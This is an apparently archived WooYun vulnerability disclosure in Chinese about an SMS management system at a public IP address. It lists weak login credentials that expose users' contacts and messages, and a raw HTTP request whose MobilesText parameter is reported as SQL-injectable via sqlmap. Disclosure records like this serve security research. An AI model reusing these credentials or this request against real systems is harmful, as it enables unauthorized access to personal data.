乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-08: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
rt
**********
chenh 123456zw 123456
使用chenh登陆系统可以查看部分用户通讯录及短信
其中搜索一处存在sql注射
POST /Management/SmsSend/SmsSendMange.aspx HTTP/1.1Host: 220.165.4.29User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://220.165.4.29/Management/SmsSend/SmsSendMange.aspxCookie: ASP.NET_SessionId=u4cixdydrjcpoljxcjpcpbroConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 16854__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE2F30%3D&MobilesText=&SmsContentText=&SubmitStatus=%E5%85%A8%E9%83%A8&MSGTYPE=%E5%85%A8%E9%83%A8&startTime=&endTime=&btnSearch=%E6%90%9C%E7%B4%A2
参数MobilesText,sqlmap验证结果
从图中可以看到包括旅行\酒店\保险\短信等数据库.点到就好。
过滤
危害等级:中
漏洞Rank:10
确认时间:2016-01-08 09:53
十分感谢!
暂无